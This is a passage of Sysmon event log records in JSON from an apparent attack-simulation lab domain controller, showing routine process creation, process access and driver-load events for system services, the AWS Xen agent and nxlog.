.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.849\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.849","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.849\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.849","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":1212,"ProcessID":2740,"ThreadID":3448,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:26.407\r\nImageLoaded: C:\\Windows\\System32\\drivers\\xenvif.sys\r\nHashes: MD5=159E9512AA64057D43A1BEDF4D3122E0,SHA256=1932630E63EBE989E884C4EE8FA6C0A9FC1C1638397D721995C23EF292BB5B23,IMPHASH=C119D28B8420C26CE25D996F6D25FD88\r\nSigned: true\r\nSignature: Amazon Web Services, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 05:46:26.407","ImageLoaded":"C:\\Windows\\System32\\drivers\\xenvif.sys","Hashes":"MD5=159E9512AA64057D43A1BEDF4D3122E0,SHA256=1932630E63EBE989E884C4EE8FA6C0A9FC1C1638397D721995C23EF292BB5B23,IMPHASH=C119D28B8420C26CE25D996F6D25FD88","Signed":"true","Signature":"Amazon Web Services, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.839\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010E5B90200}\r\nProcessId: 2616\r\nImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nFileVersion: 1.0\r\nDescription: xenagent\r\nProduct: XENIFACE\r\nCompany: Amazon Inc.\r\nOriginalFileName: xenagent.exe\r\nCommandLine: \"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.839","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010E5B90200}","Image":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","FileVersion":"1.0","Description":"xenagent","Product":"XENIFACE","Company":"Amazon Inc.","OriginalFileName":"xenagent.exe","CommandLine":"\"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.850\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 924\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010E5B90200}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.850","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"924","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010E5B90200}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.850\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010E5B90200}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.850","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010E5B90200}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1216,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.856\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 2588\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010E5B90200}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.856","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"2588","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010E5B90200}","TargetProcessId":"2616","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1217,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.856\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-00102EBE0200}\r\nProcessId: 2100\r\nImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files (x86)\\nxlog\\nxlog.exe\" -c \"C:\\Program Files (x86)\\nxlog\\conf\\nxlog.conf\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.856","ProcessGuid":"{A837DB8D-01C5-5F25-0000-00102EBE0200}","Image":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files (x86)\\nxlog\\nxlog.exe\" -c \"C:\\Program Files (x86)\\nxlog\\conf\\nxlog.conf\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1218,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.857\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00102EBE0200}\r\nTargetProcessId: 2100\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.857","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00102EBE0200}","TargetProcessId":"2100","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.857\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00102EBE0200}\r\nTargetProcessId: 2100\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.857","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00102EBE0200}","TargetProcessId":"2100","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
